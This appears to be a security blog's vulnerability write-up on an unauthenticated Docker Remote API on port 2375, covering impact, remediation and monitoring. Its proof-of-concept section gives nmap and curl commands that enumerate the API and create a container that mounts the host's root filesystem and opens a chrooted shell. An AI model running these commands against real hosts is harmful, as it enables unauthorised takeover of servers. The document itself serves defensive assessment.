Open Docker API Port Without TLS

Quick Summary

Open Docker API Port Without TLS is a critical misconfiguration where the Docker Remote API is exposed over TCP (commonly port 2375) without TLS encryption or authentication. This allows unauthenticated users to directly interact with the Docker daemon, potentially resulting in container manipulation, data exfiltration, or full host compromise.

Vulnerability Classification

FieldValue
Vulnerability TypeInsecure Remote Management Interface
CWE IDCWE-306 – Missing Authentication for Critical Function
CVE IDN/A (Configuration Issue)
CVSS 4.0 Base Score9.6 (Critical)
CVSS VectorAV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H
OWASP CategoryA05:2021 – Security Misconfiguration
Attack SurfaceExternal / Internal Network

Affected Asset / Environment

  • Service: Docker Remote API
  • Common Ports: 2375 (Non-TLS), 2376 (TLS)
  • Platforms: Linux Servers, Cloud Instances, Container Hosts
  • Testing Method: Black-box / External Assessment
  • Tools Used: Nmap, curl, Docker CLI

Description

The assessor observed that the Docker daemon is listening on TCP port 2375 without TLS protection. The Docker Remote API allows administrative control over containers, images, volumes, and networks.

When exposed without TLS or authentication, attackers can directly communicate with the Docker daemon using HTTP requests. Since Docker typically runs with elevated privileges, this misconfiguration may lead to complete host compromise.

Publicly exposed Docker APIs have been widely abused to deploy cryptocurrency miners, malicious containers, and persistent backdoors.

Root Cause

The issue occurs due to insecure Docker daemon configuration.

Common root causes include:

  • Docker daemon started with -H tcp://0.0.0.0:2375
  • TLS not configured for remote API
  • Missing firewall restrictions
  • Misconfigured cloud security groups
  • Lack of secure container host hardening

Business Impact

Exploitation of this vulnerability may allow attackers to deploy unauthorized containers, access sensitive application data, or mount host directories. This may result in full server takeover, data theft, or service disruption.

In production environments, compromise of the container host may affect multiple applications and services, leading to operational downtime and financial loss.

Technical Impact

An attacker can:

  • Query Docker version and configuration
  • List running containers
  • Pull malicious images
  • Create privileged containers
  • Mount host file system
  • Execute arbitrary commands on host

This exposure provides direct administrative control over the container host.

Proof of Concept (PoC)

Step1: Identify Open Docker API Port

nmap -sV -p 2375,2376 <target-ip>

If port 2375 is open and identified as Docker, proceed to validation.

Step2: Retrieve Docker Version Information

curl http://<target-ip>:2375/version

If version details are returned without authentication, the API is exposed.

Step3: List Running Containers

curl http://<target-ip>:2375/containers/json

If container details are displayed, unauthorized API access is confirmed.

Step4: Create a Test Container (Authorized Testing Only)

curl -X POST http://<target-ip>:2375/containers/create \
-H "Content-Type: application/json" \
-d '{"Image":"alpine","Cmd":["id"]}'

If container creation succeeds without authentication, the system is critically exposed.

Step5: Mount Host File System (Authorized Testing Only)

curl -X POST http://<target-ip>:2375/containers/create \
-H "Content-Type: application/json" \
-d '{"Image":"alpine","Cmd":["chroot","/host","/bin/sh"],"HostConfig":{"Binds":["/:/host"]}}'

Successful execution confirms potential host-level compromise.

Exploitation Prerequisites

  • Network access to port 2375
  • Docker daemon running
  • No TLS configured
  • No authentication enforcement
  • Firewall not restricting access

Remediation

It is recommended that the Docker Remote API not be exposed without TLS and access controls.

Recommended actions:

  • Disable remote API if not required
  • Configure TLS authentication (port 2376)
  • Bind Docker daemon to localhost
  • Restrict access via firewall rules
  • Implement role-based access control
  • Regularly audit container host configurations

After implementing controls, validate that unauthenticated access is blocked.

Detection and Monitoring

  • Monitor traffic to ports 2375 and 2376
  • Alert on external API requests
  • Review Docker daemon logs
  • Conduct periodic external exposure scans

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *